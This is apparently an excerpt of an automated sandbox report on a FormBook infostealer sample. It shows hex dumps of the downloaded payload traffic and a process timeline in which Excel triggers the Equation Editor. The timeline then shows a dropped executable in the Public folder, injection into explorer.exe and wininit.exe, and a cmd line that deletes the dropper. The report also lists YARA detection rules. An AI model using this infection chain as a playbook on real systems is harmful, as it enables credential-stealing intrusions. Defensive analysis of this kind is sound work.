                                              Data Ascii: V'qtY6q=2-o2sO;msgK]Nx dVCuTCZ`C.^K,zG<@y`8CQV1(|<%kV]+y}-[%ukJtk[}UL4VHKN`;a18@bh0x8&t'
                                              2022-01-14 15:04:36 UTC512INData Raw: e7 c8 cf c8 d8 94 e7 94 2b b7 f5 be d1 a6 21 7b 94 aa 3e eb 45 53 9f f9 82 69 cc 7e d1 34 39 d5 65 3e 67 6a af 3e 27 8f 89 e4 b8 fe da 73 a6 41 8e 1b 32 9f 95 db cf ca 63 cf 98 9a 2b 4f 9b 7a 19 eb 33 9f 31 75 72 dc 94 3f d5 dc 6a 3b 6e ca ae ad 30 1b 27 7d d5 43 60 59 4f 7f ce ef 01 e0 ee 00 f8 35 36 f0 4c 7e e4 d7 6f 2d 7e f6 bf 9a dc 6b 93 cd e9 d7 7f d6 09 00 27 77 de ef 4a 80 8f 02 00 c3 ba 00 c0 30 93 7b 31 06 00 97 86 77 02 40 59 ce 14 73 a3 3d cb b4 35 9d 13 00 ac 53 d5 a9 00 80 d7 06 3b 62 fe 72 0f 00 cc bf c1 69 63 04 00 95 40 20 a2 96 10 10 5a 05 04 16 00 9b 2d 04 6a 2c 08 d4 fc 01 00 b6 38 00 c8 a8 02 00 a2 ba 68 75 08 04 2c 00 d2 a3 01 b0 4e 00 b0 bb 9f 79 fb f5 01 e6 f4 81 78 73 fa 20 10 18 2c 7f df a1 0e 00 c3 cd c5 13 62 7e 01 c0 e5 33 4f
                                              Data Ascii: +!{>ESi~49e>gj>'sA2c+Oz31ur?j;n0'}C`YO56L~o-~k'wJ0{1w@Ys=5S;bric@ Z-j,8hu,Nyxs ,b~3O
                                              2022-01-14 15:04:36 UTC528INData Raw: b4 37 ec 0f ce 05 e0 aa c0 cc f2 c4 70 5f 9b d3 e9 27 89 b2 2a 80 f1 99 f5 01 04 7d 02 62 bd df fc 03 10 80 04 cf f5 df 07 c8 eb 60 6c 1e c3 ec bc 1e 50 c1 f4 03 06 0c 88 bb ef be fb 74 15 81 9f a1 a4 e0 98 f7 a1 77 e0 bf 88 04 08 50 06 b0 c4 c8 49 4a 00 c9 b8 dd 84 3d 6e d4 6e 54 6f f9 20 e8 45 41 e7 0d ff 4c a7 04 70 c6 6f 04 ca 9c 64 2e 76 02 c0 b8 4e 00 c8 4e f7 09 20 41 57 03 02 00 9c 8d 0f 01 c0 97 00 f1 d6 fc e7 13 22 7d 80 a0 14 70 29 40 93 40 42 d0 08 0c 9b 9f 14 90 e7 cc 9f 9f ea 01 30 58 01 50 5d c0 d7 81 7b 00 8c b7 d2 52 00 f3 a3 f1 02 80 09 02 00 51 ce 04 05 41 18 00 51 10 50 00 88 30 7e de a4 18 00 58 35 a9 1c 00 c2 20 28 8a a8 55 21 30 55 00 30 55 37 05 dd 8a 49 00 fb b7 ce d6 73 01 fc 05 41 30 3e 00 f0 97 05 f7 3b 01 3d 04 fc 25 c1 fc 85
                                              Data Ascii: 7p_'*}b`lPtwPIJ=nnTo EALpod.vNN AW"}p)@@B0XP]{RQAQP0~X5 (U!0U0U7IsA0>;=%
                                              2022-01-14 15:04:36 UTC544INData Raw: 56 00 2c 8a 01 40 46 7c 0f 80 3e d9 01 b0 3c 13 00 fa a7 03 c0 1c 00 35 80 55 40 60 80 8a bf 79 8d af 01 68 43 d0 9a 01 c9 b3 01 11 00 82 03 08 b1 0b f1 a7 02 60 9d 87 c0 fe f5 25 2d 00 60 78 76 00 20 7e f9 39 13 00 e2 e2 3f 15 07 80 c4 e9 10 67 08 05 40 59 12 00 ce a6 01 a0 4c d2 81 32 f7 e5 89 77 dc b7 e2 04 9a d7 3c 24 2e e0 06 b7 f8 95 1e 6e ee 07 2f 38 c9 93 a3 bb 07 59 3d 80 db 87 d9 5d 84 6d c5 20 2b 05 b9 7b 10 a9 00 a2 8f 0b df 0a 84 fc 8c 03 00 00 a3 4a f3 dc 33 77 ff 87 9b f3 62 47 57 27 0e 60 9f 8c f2 08 1e 00 1c 94 d1 1f 37 60 10 b8 70 e8 0d 77 e1 d8 0c 37 fb 59 2f fe 57 27 ff 64 e3 fc 97 fb fd 7f e4 cc 54 d0 11 24 15 74 44 66 5b 71 31 c0 d0 a1 c7 0c 00 c2 22 0f b7 bd fc c9 bf 19 75 11 22 f0 70 29 5d 7a c0 84 d1 9d f7 31 6a 5b f1 8e 74 20 3e
                                              Data Ascii: V,@F|><5U@`yhC`%-`xv ~9?g@YL2w<$.n/8Y=]m +{J3wbGW'`7`pw7Y/W'dT$tDf[q1"u"p)]z1j[t >
                                              2022-01-14 15:04:36 UTC560INData Raw: 43 27 20 85 bb a2 a2 22 15 0e 45 3d fa ee 11 9f 8d b0 08 1f 11 fd ff dd 9d 07 98 54 e5 f9 f6 63 12 54 32 db 80 65 e9 bd 2c 1d 76 91 de ab 28 bd 2e bd 97 58 40 01 15 44 14 05 c1 42 94 22 60 85 d8 50 10 e9 8a 15 14 8d 05 45 50 8a 80 a0 a0 c6 1a a3 51 34 89 20 be df fd 7b 67 9e e1 ec b2 0b 0b ec 66 fd 7f 5c d7 cb ec cc 9c 36 e7 9c fb 7e ee a7 bc cf 21 1a 8f 85 47 15 10 8c 03 e0 c8 70 a2 e9 d4 11 10 78 c3 4a 63 b1 51 0a 04 a0 b9 ff 50 04 c1 2a 3c de 43 28 6c 8b ef d9 2e a9 40 a4 3e d2 1f a0 12 bc 03 fc 90 10 cb 10 a8 04 e4 a4 f2 00 2f df 31 ac c1 87 3d e9 87 ef 20 8c e0 13 85 70 63 c8 f9 f3 1d 9f a3 36 f8 7d c4 2e f2 1c a8 b9 35 c8 02 d0 15 98 13 47 1a 30 4a 00 9b 27 fa 0a bf 74 0a e0 6c 09 40 ef 19 db d6 f7 f2 24 70 02 01 3c d5 c7 cb ff 53 11 c0 ae 67 c2 e0
                                              Data Ascii: C' "E=TcT2e,v(.X@DB"`PEPQ4 {gf\6~!GpxJcQP*<C(l.@>/1= pc6}.5G0J'tl@$p<Sg
                                              2022-01-14 15:04:36 UTC576INData Raw: 6f c4 08 48 fe fd a2 45 8b 62 04 1a ff 7d c6 21 a0 c4 b0 be 40 1e 33 6f de bc 18 91 48 48 9f 79 ab 8e b4 9f 3b 77 6e 48 56 34 24 d0 10 e0 0b c9 02 87 90 dd 54 ec 51 d4 43 6c 09 ab 0c 08 01 3c 16 98 ef e8 18 64 8d 3c b1 e8 14 06 61 d5 f1 bd 49 df 51 cb cf 6c 3e fc fb b4 b4 34 6f fd 89 0d 50 1b 60 6d c1 70 0b 00 2a ef c9 1c e0 ef 13 cd c7 0d a0 b2 10 1f 9e 18 03 d6 9f 65 99 58 44 e9 31 99 00 48 80 e3 a4 10 09 b2 e1 3d 92 df a6 2d b3 1e b1 0a f6 87 0a b1 ce c1 90 43 9e 83 3d 07 09 20 1d 11 dc 79 e7 9d f9 c5 a8 b1 c4 02 24 b5 60 7f 6a 03 0a e8 82 14 44 02 32 50 05 48 45 91 82 27 02 f9 89 45 e4 3f 16 c3 77 d4 7a 64 0e 08 12 95 a6 54 54 80 2f 4b 3d 01 33 0b e5 2e 54 90 1b 41 3a b1 12 15 24 02 6f b2 14 43 15 11 42 55 b9 0a 64 14 6a 10 43 a0 e4 54 ee 42 6d 29 82
                                              Data Ascii: oHEb}!@3oHHy;wnHV4$TQCl<d<aIQl>4oP`mp*eXD1H=-C= y$`jD2PHE'E?wzdTT/K=3.TA:$oCBUdjCTBm)


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:16:03:27
                                              Start date:14/01/2022
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13fa90000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:03:46
                                              Start date:14/01/2022
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:03:50
                                              Start date:14/01/2022
                                              Path:C:\Users\Public\Pcportk28.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\Pcportk28.exe
                                              Imagebase:0x10e0000
                                              File size:601600 bytes
                                              MD5 hash:25EE51200E7D86AB2C531748E5C01C72
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Start time:16:03:54
                                              Start date:14/01/2022
                                              Path:C:\Users\Public\Pcportk28.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\Pcportk28.exe
                                              Imagebase:0x10e0000
                                              File size:601600 bytes
                                              MD5 hash:25EE51200E7D86AB2C531748E5C01C72
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:16:03:56
                                              Start date:14/01/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:16:04:07
                                              Start date:14/01/2022
                                              Path:C:\Windows\SysWOW64\wininit.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wininit.exe
                                              Imagebase:0x6f0000
                                              File size:96256 bytes
                                              MD5 hash:B5C5DCAD3899512020D135600129D665
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:16:04:12
                                              Start date:14/01/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del "C:\Users\Public\Pcportk28.exe"
                                              Imagebase:0x4a4c0000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >